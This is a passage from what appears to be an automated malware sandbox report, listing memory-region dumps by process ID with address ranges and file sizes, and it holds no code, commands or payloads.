                              6.9MB

                            • memory/3848-13-0x0000000000000000-mapping.dmp
                            • memory/3876-163-0x0000000000000000-mapping.dmp
                            • memory/3936-268-0x0000000000400000-0x0000000000420000-memory.dmp
                              Filesize

                              128KB

                            • memory/3936-266-0x000000000041A684-mapping.dmp
                            • memory/3936-265-0x0000000000400000-0x0000000000420000-memory.dmp
                              Filesize

                              128KB

                            • memory/4112-118-0x0000000000000000-mapping.dmp
                            • memory/4120-121-0x0000000000000000-mapping.dmp
                            • memory/4176-303-0x0000000000000000-mapping.dmp
                            • memory/4232-293-0x0000000000000000-mapping.dmp
                            • memory/4248-358-0x00000000050C0000-0x00000000050E4000-memory.dmp
                              Filesize

                              144KB

                            • memory/4248-281-0x00000000005B0000-0x00000000005B1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4248-280-0x0000000071860000-0x0000000071F4E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4248-287-0x0000000004E10000-0x0000000004E11000-memory.dmp
                              Filesize

                              4KB

                            • memory/4248-355-0x0000000005090000-0x00000000050B3000-memory.dmp
                              Filesize

                              140KB

                            • memory/4248-277-0x0000000000000000-mapping.dmp
                            • memory/4268-128-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/4268-129-0x000000000043FCC3-mapping.dmp
                            • memory/4268-131-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/4312-132-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/4312-133-0x0000000000417A8B-mapping.dmp
                            • memory/4312-135-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/4336-58-0x0000000000000000-mapping.dmp
                            • memory/4344-218-0x0000000000000000-mapping.dmp
                            • memory/4344-220-0x0000000072330000-0x0000000072A1E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4344-234-0x000000000A7B0000-0x000000000A801000-memory.dmp
                              Filesize

                              324KB

                            • memory/4344-223-0x0000000000A70000-0x0000000000A71000-memory.dmp
                              Filesize

                              4KB

                            • memory/4344-221-0x0000000000310000-0x0000000000311000-memory.dmp
                              Filesize

                              4KB

                            • memory/4360-139-0x0000000000400000-0x0000000000425000-memory.dmp
                              Filesize

                              148KB

                            • memory/4360-137-0x000000000041A684-mapping.dmp
                            • memory/4360-136-0x0000000000400000-0x0000000000425000-memory.dmp
                              Filesize

                              148KB

                            • memory/4380-259-0x0000000000000000-mapping.dmp
                            • memory/4424-63-0x0000000000000000-mapping.dmp
                            • memory/4436-66-0x0000000070010000-0x00000000706FE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4436-64-0x0000000000000000-mapping.dmp
                            • memory/4564-70-0x0000000070010000-0x00000000706FE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4564-67-0x0000000000000000-mapping.dmp
                            • memory/4628-257-0x0000000000000000-mapping.dmp
                            • memory/4640-368-0x0000000000000000-mapping.dmp
                            • memory/4640-373-0x00007FFED1450000-0x00007FFED1E3C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4684-335-0x0000000000000000-mapping.dmp
                            • memory/4712-336-0x00000000000B0000-0x00000000000B1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4712-331-0x0000000000000000-mapping.dmp
                            • memory/4712-334-0x00007FFED1450000-0x00007FFED1E3C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4712-330-0x0000000000000000-mapping.dmp
                            • memory/4716-339-0x0000000000000000-mapping.dmp
                            • memory/4716-340-0x00007FFED1450000-0x00007FFED1E3C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4716-344-0x0000025823BF0000-0x0000025823BF1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4716-345-0x000002583E230000-0x000002583E231000-memory.dmp
                              Filesize

                              4KB

                            • memory/4756-155-0x0000000000000000-mapping.dmp
                            • memory/4864-232-0x0000000000000000-mapping.dmp
                            • memory/4900-177-0x000000000041A684-mapping.dmp
                            • memory/4952-171-0x000000000043FCC3-mapping.dmp
                            • memory/4952-174-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/4976-106-0x0000000070010000-0x00000000706FE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4976-103-0x0000000000000000-mapping.dmp
                            • memory/4976-112-0x0000000000C50000-0x0000000000C51000-memory.dmp
                              Filesize

                              4KB

                            • memory/4976-185-0x0000000005A00000-0x0000000005AB0000-memory.dmp
                              Filesize

                              704KB

                            • memory/4976-189-0x00000000060A0000-0x00000000060A1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4976-203-0x0000000005AC0000-0x0000000005ACD000-memory.dmp
                              Filesize

                              52KB

                            • memory/5012-107-0x0000000000000000-mapping.dmp
                            • memory/5024-374-0x0000000000000000-mapping.dmp
                            • memory/5060-357-0x0000000000000000-mapping.dmp
                            • memory/5060-359-0x0000000071860000-0x0000000071F4E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/5084-212-0x0000000000400000-0x0000000000493000-memory.dmp
                              Filesize

                              588KB

                            • memory/5084-214-0x000000000043FCC3-mapping.dmp
                            • memory/5084-216-0x0000000000400000-0x0000000000493000-memory.dmp
                              Filesize

                              588KB